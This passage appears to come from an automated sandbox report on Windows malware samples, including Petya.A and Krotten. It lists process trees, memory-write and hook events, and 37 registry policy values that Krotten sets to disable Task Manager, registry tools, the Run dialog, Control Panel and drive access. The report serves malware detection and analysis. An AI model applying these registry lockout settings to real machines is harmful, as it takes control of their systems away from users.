chrome.exechrome.exepid process 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
winrar-x64-611.exeinstaller.exeWinRAR.exeinstaller.exeInstaller.exeProductAgentUI.exeEndermanch@Petya.A.exeLogonUI.exepid process 3728 winrar-x64-611.exe 3728 winrar-x64-611.exe 4952 installer.exe 4712 WinRAR.exe 4712 WinRAR.exe 4484 installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 4268 ProductAgentUI.exe 3504 Installer.exe 3504 Installer.exe 3084 Endermanch@Petya.A.exe 2372 LogonUI.exe 2372 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 1160 wrote to memory of 332 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 332 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 
1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 5108 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3644 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3644 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe PID 1160 wrote to memory of 3608 1160 chrome.exe chrome.exe -
System policy modification 1 TTPs 37 IoCs
Processes:
Endermanch@Krotten.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" Endermanch@Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" Endermanch@Krotten.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" Endermanch@Krotten.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" Endermanch@Krotten.exe Set value (int) 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" Endermanch@Krotten.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" Endermanch@Krotten.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\smi_gui.exe"C:\Users\Admin\AppData\Local\Temp\smi_gui.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe95074f50,0x7ffe95074f60,0x7ffe95074f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1852 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2292 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4560 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x238,0x23c,0x240,0x214,0x1e8,0x7ff7ed57a890,0x7ff7ed57a8a0,0x7ff7ed57a8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1592 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4060 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2172 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3300 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6876 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe
